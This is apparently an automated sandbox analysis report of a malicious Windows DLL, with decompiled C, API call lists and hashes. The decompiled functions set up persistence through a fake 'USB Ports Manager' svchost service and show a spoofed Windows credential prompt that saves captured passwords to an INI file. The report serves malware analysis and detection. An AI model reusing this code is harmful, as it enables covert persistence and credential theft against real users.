                                                                                                                        0x6f335caa
                                                                                                                        0x6f335cad
                                                                                                                        0x6f335cb0
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f335cb2
                                                                                                                        0x6f335cb6
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f335cb8
                                                                                                                        0x00000000
                                                                                                                        0x6f335cb8
                                                                                                                        0x6f335c83
                                                                                                                        0x6f335c87
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f335c89
                                                                                                                        0x00000000
                                                                                                                        0x6f335c65
                                                                                                                        0x6f335c6c
                                                                                                                        0x6f335c71
                                                                                                                        0x00000000
                                                                                                                        0x6f335c71
                                                                                                                        0x6f335c63
                                                                                                                        0x6f335c14
                                                                                                                        0x6f335c4f
                                                                                                                        0x6f335c54
                                                                                                                        0x00000000
                                                                                                                        0x6f335c54
                                                                                                                        0x6f335c1c
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f335c28
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f335c28

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 6F33A3D0: lstrlenA.KERNEL32(?,?,?,?,00000000,?), ref: 6F33A3DB
                                                                                                                          • Part of subcall function 6F33A3D0: LocalAlloc.KERNEL32(00000040,00000004,?,?,?,00000000,?), ref: 6F33A3F4
                                                                                                                        • CharLowerA.USER32 ref: 6F335B93
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000400), ref: 6F335BB5
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F335BBC
                                                                                                                        • lstrlenA.KERNEL32 ref: 6F335BD2
                                                                                                                        • RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 6F335BE1
                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 6F335CE5
                                                                                                                          • Part of subcall function 6F335AF0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6F335B03
                                                                                                                          • Part of subcall function 6F335AF0: PostThreadMessageA.USER32 ref: 6F335B2E
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 6F336401
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F336408
                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 6F336420
                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 6F33643B
                                                                                                                        • CloseHandle.KERNEL32 ref: 6F336444
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 6F336450
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F336453
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 6F33645F
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F336462
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 6F336467
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F33646A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$FreeProcess$AllocLocallstrlen$CharCloseComputeCrc32CreateEventHandleLowerMessageObjectPostSingleSleepThreadWait
                                                                                                                        • String ID: "%s%s" /c %s$%lu$%s%c%lu%s$%s%s$%s%s%s$.cab$.pdll$/c %s$cmd.exe$gd$open
                                                                                                                        • API String ID: 2480811851-2674861874
                                                                                                                        • Opcode ID: 871004302043b80dabc75070c8d11b4cbf388b11f041d90172e49755a63ece1d
                                                                                                                        • Instruction ID: 77f9461c5fc2ebf34d36e2996fa021b08ba751c64d09693b0043dfe7a116ba72
                                                                                                                        • Opcode Fuzzy Hash: 871004302043b80dabc75070c8d11b4cbf388b11f041d90172e49755a63ece1d
                                                                                                                        • Instruction Fuzzy Hash: 43325AB3E483E5BFEB20DB288C45F6B766DEF46B14F004509F955AA1C1D7B1E81087A2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F333C60, Relevance: 98.4, APIs: 40, Strings: 16, Instructions: 398registrystringserviceCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 84%
                                                                                                                        			E6F333C60() {
				char _v760;
				char _v772;
				char _v780;
				char _v1016;
				char _v1024;
				char _v1032;
				char _v1036;
				char _v1040;
				char _v1044;
				char _v1048;
				intOrPtr _v1052;
				int _v1056;
				intOrPtr _v1060;
				int _v1064;
				intOrPtr _v1068;
				int _v1072;
				int* _v1076;
				char _v1080;
				char* _v1084;
				char* _v1088;
				void* _v1092;
				void* _v1096;
				char _v1100;
				void* _v1104;
				void* _v1108;
				void* _v1112;
				int _v1116;
				void* _v1120;
				char* _v1124;
				void* _v1128;
				intOrPtr _v1132;
				char _v1140;
				void* _t80;
				void** _t85;
				char* _t99;
				int _t100;
				intOrPtr _t104;
				intOrPtr _t108;
				char* _t125;
				void* _t145;
				long _t151;
				char* _t173;
				CHAR* _t174;
				long _t182;
				char** _t196;
				char** _t199;
				char** _t200;
				char** _t201;
				char** _t202;
				char** _t203;
				intOrPtr _t207;
				intOrPtr _t220;

				_t196 =  &_v1124;
				_v1112 = 0;
				_t80 = OpenSCManagerA(0, 0, 0xf003f);
				_v1108 = _t80;
				if(_t80 != 0) {
					L2:
					_v1124 = 0;
					_t145 = OpenServiceA(_t80, "USBManager", 0xf01ff);
					if(_t145 != 0) {
						L14:
						_v1112 = 1;
						wsprintfA( &_v1044, "SYSTEM\\CurrentControlSet%s%s%s", "\\Services\\", "USBManager", "\\Parameters");
						if(RegCreateKeyExA(0x80000002,  &_v1036, 0, 0, 0, 0xf023f, 0,  &_v1116, 0) == 0) {
							_push(0x105);
							_push( &_v1036);
							L6F33C2EE();
							_v1120 = 0x105;
							_v1116 = 2;
							if(RegQueryValueExA(_v1124, "ServiceDLL", 0,  &_v1116,  &_v1044,  &_v1120) != 0) {
								L17:
								_t151 = M6F34052C; // 0x33
								_t173 = M6F340524; // 0x9954b0
								RegSetValueExA(_v1124, "ServiceDLL", 0, 2, _t173, _t151 + 1);
							} else {
								_t174 = M6F340524; // 0x9954b0
								if(lstrcmpiA( &_v1044, _t174) != 0) {
									goto L17;
								}
							}
							RegCloseKey(_v1124);
						}
						L6F33C2EE();
						_t85 =  &_v1104;
						_v1104 = 0;
						__imp__QueryServiceStatusEx(_t145, 0,  &_v1080, 0x24, _t85,  &_v1072, 0x24);
						if(_t85 == 0 || _v1096 != 4) {
							_t220 = M6F340544; // 0x1
							if(_t220 == 0) {
								_push(0);
								_push(0);
							} else {
								_push(1);
								_v1140 = "s";
								_push( &_v1140);
							}
							_push(_t145);
							E6F3337D0();
						}
						CloseServiceHandle(_t145);
					} else {
						_t207 = M6F340544; // 0x1
						if(_t207 != 0) {
							_t99 = M6F34053C; // 0x9973a5
							_t100 = wsprintfA( &_v780, "%%SYSTEMROOT%%\\system32\\%s.exe -k \"%s\" -svcr \"%s\"", "svchost", "USBPortsManagerGrp", _t99);
							_t199 =  &(_t196[5]);
							_v1112 = _t100;
							_t145 = CreateServiceA(_v1100, "USBManager", "USB Ports Manager", 0xf01ff, 0x20, 2, 0,  &_v772, 0, 0, 0, 0, 0);
							if(_t145 != 0) {
								_v1072 = 1;
								_v1064 = 1;
								_v1056 = 1;
								_v1068 = 0x1388;
								_v1060 = 0x1388;
								_v1052 = 0x1388;
								_v1092 = 0;
								_v1084 = 0;
								_v1088 = 0;
								_v1080 = 3;
								_v1076 =  &_v1072;
								__imp__ChangeServiceConfig2A(_t145, 2,  &_v1092);
								_t104 =  *0x6f34047c; // 0x998bd0
								wsprintfA( &_v1048, "%s\\%s%c%s", _t104, "svchost", 0, 0x6f33d543);
								_t200 =  &(_t199[6]);
								if(RegCreateKeyExA(0x80000002,  &_v1040, 0, 0, 0, 0xf023f, 0,  &_v1120, 0) == 0) {
									RegSetValueExA(_v1120, "USBPortsManagerGrp", 0, 7, "USBManager", lstrlenA("USBManager"));
									RegCloseKey(_v1120);
								}
								_t108 =  *0x6f34047c; // 0x998bd0
								wsprintfA( &_v1040, "%s\\%s%c%s", _t108, "svchost", 0x5c, "USBPortsManagerGrp");
								_t201 =  &(_t200[6]);
								if(RegCreateKeyExA(0x80000002,  &_v1032, 0, 0, 0, 0xf023f, 0,  &_v1112, 0) == 0) {
									E6F332170(_v1112, 4);
									_t201 =  &(_t201[2]);
									_v1100 = 0x2000;
									RegSetValueExA(_v1112, "AuthenticationCapabilities", 0, 4,  &_v1100, 4);
									_v1104 = 1;
									RegSetValueExA(_v1112, "CoInitializeSecurityParam", 0, 4,  &_v1104, 4);
									RegCloseKey(_v1112);
								}
								wsprintfA( &_v1032, "SYSTEM\\CurrentControlSet%s%s%s", "\\Services\\", "USBManager", "\\Parameters");
								_t202 =  &(_t201[5]);
								if(RegCreateKeyExA(0x80000002,  &_v1024, 0, 0, 0, 0xf023f, 0,  &_v1104, 0) == 0) {
									E6F332170(_v1104, 4);
									_t182 = M6F34052C; // 0x33
									_t125 = M6F340524; // 0x9954b0
									_t202 =  &(_t202[2]);
									RegSetValueExA(_v1104, "ServiceDLL", 0, 2, _t125, _t182 + 1);
									RegSetValueExA(_v1104, "ImagePath", 0, 2,  &_v760, _v1100 + 1);
									RegSetValueExA(_v1104, "ServiceMain", 0, 1, "SvcEntry", lstrlenA("SvcEntry"));
									_v1096 = 0;
									RegSetValueExA(_v1104, "ServiceDllUnloadOnStop", 0, 4,  &_v1096, 4);
									RegCloseKey(_v1104);
								}
								wsprintfA( &_v1024, "SYSTEM\\CurrentControlSet%s%s%s", "\\Services\\", "USBManager", 0x6f33d543);
								_t203 =  &(_t202[5]);
								if(RegCreateKeyExA(0x80000002,  &_v1016, 0, 0, 0, 0xf023f, 0,  &_v1096, 0) == 0) {
									E6F332170(_v1096, 4);
									_t203 =  &(_t203[2]);
									RegSetValueExA(_v1096, "ServiceMain", 0, 1, "SvcEntry", lstrlenA("SvcEntry"));
									RegCloseKey(_v1096);
								}
								E6F332170(_t145, 2);
								_t196 =  &(_t203[2]);
								goto L14;
							}
						}
					}
					CloseServiceHandle(_v1128);
					return _v1132;
				} else {
					_t80 = OpenSCManagerA(0, 0, 1);
					_v1108 = _t80;
					if(_t80 == 0) {
						return 0;
					} else {
						goto L2;
					}
				}
			}























































                                                                                                                        0x6f333c60
                                                                                                                        0x6f333c7a
                                                                                                                        0x6f333c7e
                                                                                                                        0x6f333c80
                                                                                                                        0x6f333c86
                                                                                                                        0x6f333c9a
                                                                                                                        0x6f333ca6
                                                                                                                        0x6f333cbc
                                                                                                                        0x6f333cc0
                                                                                                                        0x6f333fdb
                                                                                                                        0x6f333ff4
                                                                                                                        0x6f333ffc
                                                                                                                        0x6f334022
                                                                                                                        0x6f334028
                                                                                                                        0x6f334031
                                                                                                                        0x6f334032
                                                                                                                        0x6f334051
                                                                                                                        0x6f334059
                                                                                                                        0x6f334069
                                                                                                                        0x6f334081
                                                                                                                        0x6f334081
                                                                                                                        0x6f334087
                                                                                                                        0x6f33409d
                                                                                                                        0x6f33406b
                                                                                                                        0x6f33406b
                                                                                                                        0x6f33407f
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f33407f
                                                                                                                        0x6f3340a4
                                                                                                                        0x6f3340a4
                                                                                                                        0x6f3340b1
                                                                                                                        0x6f3340b6
                                                                                                                        0x6f3340c4
                                                                                                                        0x6f3340c8
                                                                                                                        0x6f3340d0
                                                                                                                        0x6f3340d9
                                                                                                                        0x6f3340df
                                                                                                                        0x6f3340f2
                                                                                                                        0x6f3340f3
                                                                                                                        0x6f3340e1
                                                                                                                        0x6f3340e1
                                                                                                                        0x6f3340e7
                                                                                                                        0x6f3340ef
                                                                                                                        0x6f3340ef
                                                                                                                        0x6f3340f4
                                                                                                                        0x6f3340f5
                                                                                                                        0x6f3340fa
                                                                                                                        0x6f3340fe
                                                                                                                        0x6f333cc6
                                                                                                                        0x6f333cc6
                                                                                                                        0x6f333ccc
                                                                                                                        0x6f333cd2
                                                                                                                        0x6f333cef
                                                                                                                        0x6f333cf1
                                                                                                                        0x6f333d10
                                                                                                                        0x6f333d24
                                                                                                                        0x6f333d28
                                                                                                                        0x6f333d3d
                                                                                                                        0x6f333d41
                                                                                                                        0x6f333d45
                                                                                                                        0x6f333d50
                                                                                                                        0x6f333d54
                                                                                                                        0x6f333d58
                                                                                                                        0x6f333d5c
                                                                                                                        0x6f333d60
                                                                                                                        0x6f333d64
                                                                                                                        0x6f333d68
                                                                                                                        0x6f333d70
                                                                                                                        0x6f333d74
                                                                                                                        0x6f333d7a
                                                                                                                        0x6f333d95
                                                                                                                        0x6f333d97
                                                                                                                        0x6f333dbb
                                                                                                                        0x6f333ddb
                                                                                                                        0x6f333de2
                                                                                                                        0x6f333de2
                                                                                                                        0x6f333de8
                                                                                                                        0x6f333e04
                                                                                                                        0x6f333e06
                                                                                                                        0x6f333e2a
                                                                                                                        0x6f333e33
                                                                                                                        0x6f333e3c
                                                                                                                        0x6f333e4f
                                                                                                                        0x6f333e57
                                                                                                                        0x6f333e6d
                                                                                                                        0x6f333e75
                                                                                                                        0x6f333e7c
                                                                                                                        0x6f333e7c
                                                                                                                        0x6f333e9b
                                                                                                                        0x6f333e9d
                                                                                                                        0x6f333ec1
                                                                                                                        0x6f333ece
                                                                                                                        0x6f333ed3
                                                                                                                        0x6f333ed9
                                                                                                                        0x6f333ee2
                                                                                                                        0x6f333ef1
                                                                                                                        0x6f333f0e
                                                                                                                        0x6f333f2e
                                                                                                                        0x6f333f44
                                                                                                                        0x6f333f48
                                                                                                                        0x6f333f4f
                                                                                                                        0x6f333f4f
                                                                                                                        0x6f333f6e
                                                                                                                        0x6f333f70
                                                                                                                        0x6f333f94
                                                                                                                        0x6f333f9d
                                                                                                                        0x6f333fa2
                                                                                                                        0x6f333fc3
                                                                                                                        0x6f333fca
                                                                                                                        0x6f333fca
                                                                                                                        0x6f333fd3
                                                                                                                        0x6f333fd8
                                                                                                                        0x00000000
                                                                                                                        0x6f333fd8
                                                                                                                        0x6f333d28
                                                                                                                        0x6f333ccc
                                                                                                                        0x6f334109
                                                                                                                        0x6f33411d
                                                                                                                        0x6f333c88
                                                                                                                        0x6f333c8c
                                                                                                                        0x6f333c8e
                                                                                                                        0x6f333c94
                                                                                                                        0x6f334129
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f333c94

                                                                                                                        APIs
                                                                                                                        • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 6F333C7E
                                                                                                                        • OpenSCManagerA.ADVAPI32(00000000,00000000,00000001), ref: 6F333C8C
                                                                                                                        • OpenServiceA.ADVAPI32(00000000,USBManager,000F01FF), ref: 6F333CAA
                                                                                                                        • wsprintfA.USER32 ref: 6F333CEF
                                                                                                                        • CreateServiceA.ADVAPI32(?,USBManager,USB Ports Manager,000F01FF,00000020,00000002,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 6F333D1E
                                                                                                                        • ChangeServiceConfig2A.ADVAPI32 ref: 6F333D74
                                                                                                                        • wsprintfA.USER32 ref: 6F333D95
                                                                                                                        • RegCreateKeyExA.ADVAPI32(80000002,?,00000000,00000000,00000000,000F023F,00000000,?,00000000,?,?,?,00000000,00000002,?), ref: 6F333DB3
                                                                                                                        • lstrlenA.KERNEL32(USBManager,?,?,?,00000000,00000002,?), ref: 6F333DC2
                                                                                                                        • RegSetValueExA.ADVAPI32(?,USBPortsManagerGrp,00000000,00000007,USBManager,00000000,?,?,?,00000000,00000002,?), ref: 6F333DDB
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,00000000,00000002,?), ref: 6F333DE2
                                                                                                                        • wsprintfA.USER32 ref: 6F333E04
                                                                                                                        • RegCreateKeyExA.ADVAPI32(80000002,?,00000000,00000000,00000000,000F023F,00000000,?,00000000), ref: 6F333E22
                                                                                                                        • RegSetValueExA.ADVAPI32 ref: 6F333E57
                                                                                                                        • RegSetValueExA.ADVAPI32(00000000,CoInitializeSecurityParam,00000000,00000004,?,00000004), ref: 6F333E75
                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 6F333E7C
                                                                                                                        • wsprintfA.USER32 ref: 6F333E9B
                                                                                                                        • RegCreateKeyExA.ADVAPI32(80000002,?,00000000,00000000,00000000,000F023F,00000000,?,00000000), ref: 6F333EB9
                                                                                                                        • RegSetValueExA.ADVAPI32(?,ServiceDLL,00000000,00000002,009954B0,00000034), ref: 6F333EF1
                                                                                                                        • RegSetValueExA.ADVAPI32(?,ImagePath,00000000,00000002,?,?), ref: 6F333F0E
                                                                                                                        • lstrlenA.KERNEL32(SvcEntry), ref: 6F333F15
                                                                                                                        • RegSetValueExA.ADVAPI32(?,ServiceMain,00000000,00000001,SvcEntry,00000000), ref: 6F333F2E
                                                                                                                        • RegSetValueExA.ADVAPI32(?,ServiceDllUnloadOnStop,00000000,00000004,?,00000004), ref: 6F333F48
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 6F333F4F
                                                                                                                        • wsprintfA.USER32 ref: 6F333F6E
                                                                                                                        • RegCreateKeyExA.ADVAPI32(80000002,?,00000000,00000000,00000000,000F023F,00000000,?,00000000), ref: 6F333F8C
                                                                                                                        • lstrlenA.KERNEL32(SvcEntry), ref: 6F333FAA
                                                                                                                        • RegSetValueExA.ADVAPI32(?,ServiceMain,00000000,00000001,SvcEntry,00000000), ref: 6F333FC3
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 6F333FCA
                                                                                                                        • wsprintfA.USER32 ref: 6F333FFC
                                                                                                                        • RegCreateKeyExA.ADVAPI32(80000002,?,00000000,00000000,00000000,000F023F,00000000,?,00000000,\Parameters), ref: 6F33401A
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000105), ref: 6F334032
                                                                                                                        • RegQueryValueExA.ADVAPI32 ref: 6F334061
                                                                                                                        • lstrcmpiA.KERNEL32(?,009954B0), ref: 6F334077
                                                                                                                        • RegSetValueExA.ADVAPI32(?,ServiceDLL,00000000,00000002,009954B0,00000034), ref: 6F33409D
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 6F3340A4
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000024), ref: 6F3340B1
                                                                                                                        • QueryServiceStatusEx.ADVAPI32(00000000,00000000,?,00000024,?,?,00000024), ref: 6F3340C8
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 6F3340FE
                                                                                                                        • CloseServiceHandle.ADVAPI32(?), ref: 6F334109
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Value$Close$CreateServicewsprintf$Openlstrlen$HandleManagerMemoryQueryZero$ChangeConfig2Statuslstrcmpi
                                                                                                                        • String ID: %%SYSTEMROOT%%\system32\%s.exe -k "%s" -svcr "%s"$%s\%s%c%s$AuthenticationCapabilities$CoInitializeSecurityParam$ImagePath$SYSTEM\CurrentControlSet%s%s%s$ServiceDLL$ServiceDllUnloadOnStop$ServiceMain$SvcEntry$USB Ports Manager$USBManager$USBPortsManagerGrp$\Parameters$\Services\$svchost
                                                                                                                        • API String ID: 567274075-2313540708
                                                                                                                        • Opcode ID: 6c46b81ff668685163f17a5dd8cb97c76a573c8b989e1ee7d0da47bd9e696097
                                                                                                                        • Instruction ID: e75517b751e58ab8b4c927880bb4f16b22d5a4c9f60e3aac4c359e693cc06952
                                                                                                                        • Opcode Fuzzy Hash: 6c46b81ff668685163f17a5dd8cb97c76a573c8b989e1ee7d0da47bd9e696097
                                                                                                                        • Instruction Fuzzy Hash: 8FD17CB2A04798BFD310DF61CC85E6BB7EDFB99B08F40490DF69992140D772E4188B66
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F3396D0, Relevance: 77.3, APIs: 38, Strings: 6, Instructions: 346memorysleeplibraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 47%
                                                                                                                        			E6F3396D0(intOrPtr _a4) {
				intOrPtr _v4;
				signed int _v72;
				char _v1028;
				short _v1036;
				char _v1048;
				void* _v1296;
				char _v1300;
				void* _v1304;
				intOrPtr _v1308;
				void* _v1312;
				void* _v1316;
				void* _v1320;
				intOrPtr _v1324;
				void* _v1328;
				void* _v1332;
				void* _v1336;
				intOrPtr _v1340;
				void* _v1344;
				void* _v1348;
				void* _v1352;
				char _v1356;
				WCHAR* _v1368;
				short* _v1372;
				char _v1376;
				void* _v1380;
				intOrPtr _v1384;
				void* _v1392;
				intOrPtr _v1396;
				struct HINSTANCE__* _v1400;
				void* _v1404;
				char _v1412;
				char _v1416;
				void* _v1420;
				long _v1424;
				long _v1432;
				long _v1436;
				long _v1448;
				intOrPtr _v1452;
				long _v1456;
				intOrPtr _v1472;
				char _v1480;
				char _v1496;
				intOrPtr _v1500;
				intOrPtr _v1508;
				intOrPtr _v1524;
				void* _v1532;
				intOrPtr _v1544;
				void* _v1556;
				void* _t93;
				void* _t94;
				void* _t99;
				CHAR* _t106;
				void* _t110;
				void* _t133;
				int _t140;
				signed int _t145;
				struct HDESK__* _t149;
				void* _t152;
				struct HINSTANCE__* _t154;
				void* _t155;
				WCHAR* _t156;
				WCHAR* _t157;
				struct HDESK__* _t158;
				struct HDESK__* _t171;
				WCHAR* _t174;
				WCHAR* _t180;
				struct HDESK__* _t183;
				WCHAR* _t185;
				struct HINSTANCE__* _t188;
				short* _t190;
				void* _t191;
				signed int _t195;
				signed int _t196;
				WCHAR* _t199;
				long _t200;
				short* _t202;
				void* _t204;
				void* _t205;
				void* _t206;

				_t93 = M6F340504; // 0x99ec68
				_t157 = M6F3404F8; // 0x99b7a8
				_t94 = E6F335130(_t157, _t93, 0x6f33d664);
				_t204 =  &_v1416 + 0xc;
				if(_t94 != 0) {
					L39:
					return 0;
				} else {
					_t152 = 0;
					if(_a4 != 0) {
						_t183 =  *0x6f340480; // 0x0
						SwitchDesktop(_t183);
						_t149 =  *0x6f340480; // 0x0
						SetThreadDesktop(_t149);
					}
					_t188 = LoadLibraryA("credui.dll");
					_v1380 = _t188;
					if(_t188 == _t152) {
						L37:
						if(_a4 != _t152) {
							Sleep(0x7d0);
							_t158 =  *0x6f340484; // 0x0
							SwitchDesktop(_t158);
							_t171 =  *0x6f340484; // 0x0
							SetThreadDesktop(_t171);
						}
						goto L39;
					}
					_push(0xff000000);
					_push(4);
					_push( &_v1356);
					_push(_t188);
					_v1356 = 0x24bec39d;
					_v1352 = _t152;
					_v1348 = _t152;
					_v1344 = _t152;
					_v1340 = 0xb4bb2c26;
					_v1336 = _t152;
					_v1332 = _t152;
					_v1328 = _t152;
					_v1324 = 0x4b177521;
					_v1320 = _t152;
					_v1316 = _t152;
					_v1312 = _t152;
					_v1308 = 0xc07eb83e;
					_v1304 = _t152;
					_v1300 = _t152;
					_v1296 = _t152;
					_t99 = E6F331DB0();
					_t205 = _t204 + 0x10;
					if(_t99 == 0) {
						L36:
						FreeLibrary(_t188);
						goto L37;
					}
					_t185 = HeapAlloc(GetProcessHeap(), 8, 0x2000);
					if(_t185 == _t152) {
						L35:
						goto L36;
					}
					_push(0x14);
					_push( &_v1376);
					L6F33C2EE();
					_v1384 = 0x14;
					_v1380 = _t152;
					_v1412 = 0x202;
					_v1396 = 0x101;
					_t26 =  &(_t185[0x657]); // 0xcae
					_t190 = _t26;
					_t27 =  &(_t185[0x6d8]); // 0xdb0
					_t199 = _t27;
					GetSystemDirectoryA( &_v1300, 0x104);
					PathAddBackslashA( &_v1300);
					_t106 = "rstrui.exe";
					if(_v4 != _t152) {
						_t106 = "wuaueng.dll";
					}
					lstrcatA( &_v1300, _t106);
					_t154 = LoadLibraryExA( &_v1300, _t152, 0x20);
					if(_t154 == 0) {
						L20:
						_t174 = M6F3404F8; // 0x99b7a8
						_t110 = M6F340504; // 0x99ec68
						_t200 = 0;
						_t191 = 0;
						_v1392 = 0;
						_v1424 = 0;
						_v1416 = 0;
						_v1404 = 0;
						_v1420 = 0;
						wsprintfW( &_v1036, L"%s\\%s", _t110, _t174);
						_t206 = _t205 + 0x10;
						_push( &_v1412);
						_push(0);
						_push(0x6f33d664);
						_push( &_v1028);
						_push(0);
						if(_v1296() != 0 || GetLastError() != 0x7a) {
							L34:
							HeapFree(GetProcessHeap(), _t200, _t185);
							_t188 = _v1400;
							_t152 = 0;
							goto L35;
						} else {
							_t155 = HeapAlloc(GetProcessHeap(), 8, _v1432);
							_v1420 = _t155;
							if(_t155 == 0) {
								goto L34;
							}
							_push( &_v1432);
							_push(_t155);
							_push(0x6f33d664);
							_push( &_v1048);
							_push(0);
							if(_v1316() == 0) {
								L33:
								HeapFree(GetProcessHeap(), _t200, _t155);
								goto L34;
							}
							while(1) {
								L25:
								_push(0x20);
								_push( &_v1436);
								_push( &_v1448);
								_push( &_v1456);
								_push(_v1452);
								_push(_t155);
								_push( &_v1424);
								_push(_t191);
								_push( &_v1416);
								_v1432 = 1;
								_v1424 = _t200;
								_v1456 = _t200;
								_v1448 = _t200;
								_v1436 = _t200;
								if(_v1384() != 0) {
									break;
								}
								_push(0x404);
								_push(_t185);
								_v1480 = 0x202;
								L6F33C2EE();
								_push(0x202);
								_t74 =  &(_t185[0x202]); // 0x404
								_t156 = _t74;
								_push(_t156);
								_v1472 = 0x101;
								L6F33C2EE();
								_push( &_v1480);
								_push(_t156);
								_push(_t200);
								_push(_t200);
								_push( &_v1496);
								_push(_t185);
								_push(_v1500);
								_push(_v1508);
								_push(1);
								if(_v1420() != 0) {
									_push(0x404);
									_t81 =  &(_t185[0x303]); // 0x606
									_t202 = _t81;
									_push(_t202);
									L6F33C2EE();
									_push(0x2a4);
									_t82 =  &(_t185[0x505]); // 0xa0a
									L6F33C2EE();
									_push(0x152);
									_t83 =  &(_t185[0x505]); // 0xa0a
									_push(0x202);
									_push(_t202);
									_push(_t185);
									if(_v1456() == 0) {
										_t85 =  &(_t185[0x505]); // 0xa0a
										_t133 = E6F335130(_t202, _t85, _t156);
										_t206 = _t206 + 0xc;
										if(_t133 == 0) {
											_v1556 = 0;
											_t191 = 0x52e;
										} else {
											_t180 = M6F3404D0; // 0x98a4d0
											WritePrivateProfileStringW(L"PWD", _t185, _t156, _t180);
										}
									}
									_t200 = 0;
								}
								__imp__CoTaskMemFree(_v1544);
								_t155 = _v1532;
								if(_v1524 == _t200) {
									continue;
								} else {
									goto L33;
								}
							}
							asm("sbb esi, esi");
							_t191 = ( ~_v72 & 0xfffff693) + 0xfdb;
							Sleep(0x1f4);
							goto L25;
						}
					} else {
						_push(0x80);
						_push(_t190);
						if(_v4 != 0) {
							if(LoadStringW(_t154, 0x69, ??, ??) > 0) {
								_v1372 = _t190;
							}
							_t195 = FormatMessageW(0xaff, _t154, 0xb0000028, 0, _t199, 0x926, 0);
							_t196 = _t195 + LoadStringW(_t154, 0x184,  &(_t199[_t195]), 0x926 - _t195);
							_t140 = wsprintfW( &(_t199[_t196]), L"\r\n\r\n");
							_t205 = _t205 + 8;
							FormatMessageW(0x12ff, 0, 0x1109, 0,  &(_t199[_t196 + _t140]), 0x926 - _t196 + _t140, 0);
							L18:
							_v1368 = _t199;
							L19:
							FreeLibrary(_t154);
							goto L20;
						}
						_t145 = LoadStringW(_t154, 0xab, ??, ??);
						if(_t145 > 0) {
							_t34 = _t145 * 2; // 0xcb2
							_t190[_t145] = 0x20002e;
							if(LoadStringW(_t154, 0x91, _t190 + _t34 + 4, 0x80 - _t145) > 0) {
								_v1372 = _t190;
							}
						}
						if(LoadStringW(_t154, 0xd2, _t199, 0x926) <= 0) {
							goto L19;
						} else {
							goto L18;
						}
					}
				}
			}


















































































                                                                                                                        0x6f3396d0
                                                                                                                        0x6f3396d5
                                                                                                                        0x6f3396e8
                                                                                                                        0x6f3396ed
                                                                                                                        0x6f3396f2
                                                                                                                        0x6f339b97
                                                                                                                        0x6f339b9f
                                                                                                                        0x6f3396f8
                                                                                                                        0x6f3396f9
                                                                                                                        0x6f339703
                                                                                                                        0x6f339705
                                                                                                                        0x6f33970c
                                                                                                                        0x6f339712
                                                                                                                        0x6f339718
                                                                                                                        0x6f339718
                                                                                                                        0x6f339729
                                                                                                                        0x6f33972b
                                                                                                                        0x6f339731
                                                                                                                        0x6f339b67
                                                                                                                        0x6f339b70
                                                                                                                        0x6f339b77
                                                                                                                        0x6f339b7d
                                                                                                                        0x6f339b84
                                                                                                                        0x6f339b8a
                                                                                                                        0x6f339b91
                                                                                                                        0x6f339b91
                                                                                                                        0x00000000
                                                                                                                        0x6f339b70
                                                                                                                        0x6f339737
                                                                                                                        0x6f33973c
                                                                                                                        0x6f339742
                                                                                                                        0x6f339743
                                                                                                                        0x6f339744
